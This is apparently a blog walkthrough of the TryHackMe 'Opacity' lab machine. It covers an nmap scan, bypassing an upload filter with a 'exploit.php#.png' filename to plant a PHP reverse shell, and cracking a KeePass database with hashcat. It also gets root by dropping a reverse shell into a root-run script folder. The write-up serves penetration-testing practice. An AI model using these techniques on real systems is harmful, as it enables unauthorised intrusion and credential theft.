Opacity TryHackMe - Writeup

Opacity

Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.

 

    Link To The Room

Introduction:

Opacity is an easy machine that can help you in the penetration testing learning process.

There are 2 hash keys located on the machine (user - local.txt and root - proof.txt). Can you find them and become root?

Hint: There are several ways to perform an action; always analyze the behavior of the application.

Welcome guys, In this blog we are going to see the full write-up of the OPACITY challenge from TryHackMe.

Scanning:

    As usual, we are starting with the Nmap scan.

                                             nmap -sS -sC 10.10.251.55

 

 

Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-10 10:29 EDT
Nmap scan report for 10.10.251.55
Host is up (0.24s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey:
|   3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA)
|   256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA)
|_  256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519)
80/tcp  open  http
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Login
|_Requested resource was login.php
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb2-time:
|   date: 2023-04-10T14:29:20
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap done: 1 IP address (1 host up) scanned in 43.17 seconds

 

By the result, we can see that there are 4 port open in the machine, SSH and HTTP ports are open.

In the HTTP port, we have a login panel.

 

As usual, the SQL injection doesn't work. On performing dirbuster, I found the following directories.

 

Exploring the directories, i found the following pages.

 

Getting into the machine:

Now what we can do is, we can upload a reverse shell through the upload field and try to get a shell.

First step is to download a php reverse shell and alter it using the host ip address and change its name as the following.

cp shell.php exploit.php#.png 

 The "#” sign indicates that the '.png' is not considered as an extension while calling the exploit. Now try to upload the exploit, it will successfully get uploaded. But we can't the shell, the reason is that the exploiting command tries to get the file name with "exploit.php" so change the file name once again to exploit.php and try again.

 

Copy past the IMAGE link and then we got the shell.

 

As we only got the basic shell we need to escalate user privileges.

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm 

stty raw -echo; fg

This command gives the normal shell to execute. 

 

Local User Escalation:

Still, we don't have permission to open files in the terminal. So while going through the file found a suspicious file in the /opt directory.

 

Downloading the file and analyzing it. Using john to crack the data.

keepass2john dataset.kdbx > data.txt  

This gives us a password hash and cracking it using hash cat we get the password.

hashcat -a 0 -m 13400 data.txt /home/kali/Downloads/rockyou.txt

Now, using the 'keepassxc' to open the dataset.kdbx file, we get the password for the user SYSADMIN.

Logging in to the ssh terminal using the username: sysadmin and the password from dataset.kdbx file.

 

Root Privilege Escalation:

After finding the local flag, i found a suspicious file in /scripts/lib folder.

The backup.inc.php file runs with the root privilege, so exploiting it using a php reverse shell.

 

 Now copying the reverse shell exploit to the /scripts/lib folder and wait till the nc to get a reverse shell.

  

Al last we got root privilege and found the root flag.

 

 Thank you for reading my blog.

Happy hacking!